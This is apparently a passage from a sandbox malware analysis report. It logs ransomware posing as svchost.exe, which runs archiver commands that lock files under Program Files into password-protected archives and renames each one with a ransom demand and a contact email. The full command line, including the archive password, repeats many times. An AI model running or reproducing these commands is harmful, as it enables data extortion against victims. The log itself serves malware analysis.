  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mn.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1828
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mng.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mng.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mng2.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mng2.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\mr.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\mr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ms.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ms.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nb.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nb.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ne.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ne.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nl.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\nn.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\nn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pa-in.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pa-in.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pl.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ps.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ps.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pt-br.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pt-br.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\pt.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\pt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ro.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ro.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ru.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ru.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sa.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\si.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\si.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sk.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sl.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sq.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sq.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sr-spc.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sr-spc.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2292
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sr-spl.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sr-spl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sv.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sv.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\sw.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\sw.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1852
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ta.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ta.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2792
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tg.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tg.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\th.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\th.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tk.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tr.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1900
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\tt.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\tt.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ug.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ug.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uk.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uk.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1188
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uz-cyrl.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uz-cyrl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\uz.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\uz.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\va.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\va.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\vi.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\vi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\yo.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\yo.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2456
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\zh-cn.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\zh-cn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2248
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\zh-tw.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\zh-tw.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\License.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\License.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\readme.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\7-Zip\readme.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\CopyRemove.zip(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\CopyRemove.zip" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:952
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:860
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2600
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2160
- C:\ProgramData\msvkp\svchost.exe
